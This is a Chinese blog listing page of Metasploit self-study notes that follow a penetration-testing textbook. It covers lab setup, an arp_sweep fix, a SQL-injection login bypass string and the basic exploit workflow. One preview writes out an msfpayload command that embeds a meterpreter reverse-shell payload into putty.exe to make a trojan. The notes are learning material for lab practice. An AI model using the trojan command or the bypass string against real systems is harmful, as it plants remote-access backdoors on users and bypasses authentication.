![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
metasploit自学
叶落秋霜
这个作者很懒,什么都没留下…
展开
-
在bt5安装vmware tools
在接触到openvas时,需要升级NVT库,然而速度太慢了,最后甚至掉零了。为此就想换下载源,网上一查挺多地址的,也懒得一行行码了,就顺便装个vmware tools,以后也能用得上。遇到了一个麻烦:进入VMware Tool时,输入cd /media/VMware Tools,怎么也不行。后来百度才知道需要注意用反斜杠转义空格。当然最简单的还是cd /med原创 2017-09-10 22:21:56 · 1522 阅读 · 0 评论 -
关于msf中的arp_sweep报错usbmon1:ERROR while getting interface flags:no such device
在根据《metasploit渗透测试魔鬼训练营》进行第82页的实验时,出现了如题的错误。经过google查询,发现之前也有人遇到过类似情况,解决方案是要将arp_sweep模块的其余三个参数都设置好。具体设置如下:set interface eth2set shosst 10.10.10.128set smac 00:0c:29:32:ed:2f设置好后即可运行该模块扫描。原创 2017-09-03 17:10:52 · 1410 阅读 · 0 评论 -
sql注入小总结
目前metasploit魔鬼渗透测试营的书看到了第四章,在跟随书上步伐学习sql注入时,有些地方感到困惑,因此小结一下。 1.P137 的绕过语句:Select * from * where user='admin' or '1=1' and password ='****' 这是因为在sql语句中,and比or的优先级更高。所以先执行'1=1' and password='****'原创 2017-11-09 15:20:17 · 363 阅读 · 0 评论 -
使用metasploit进行渗透攻击步骤
鉴于对第五章内存攻防技术的原理难以理解,所以这一章我还是主要用来熟练metasploit这个工具。 攻击过程主要分为以下几步: 1.search XXX(扫描某漏洞对应的模块) 2.use exploit/xxx/xxx/...(启用这个渗透攻击模块) 3.show payloads(作为攻击载荷的payload就是通常所说的shellcode) 4.set payl原创 2017-11-12 16:27:06 · 9030 阅读 · 0 评论 -
metasploit制作木马程序
第七章第三小节,讲的是将木马绑定到putty.exe程序下。觉得蛮有趣,这里再重复下书上的步骤: 1)百度搜索,下载原版putty程序 2)在bt5下输入命令:msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=80 R | msfencode -t exe -x /root/Desktop/putty原创 2017-11-15 19:36:55 · 2211 阅读 · 0 评论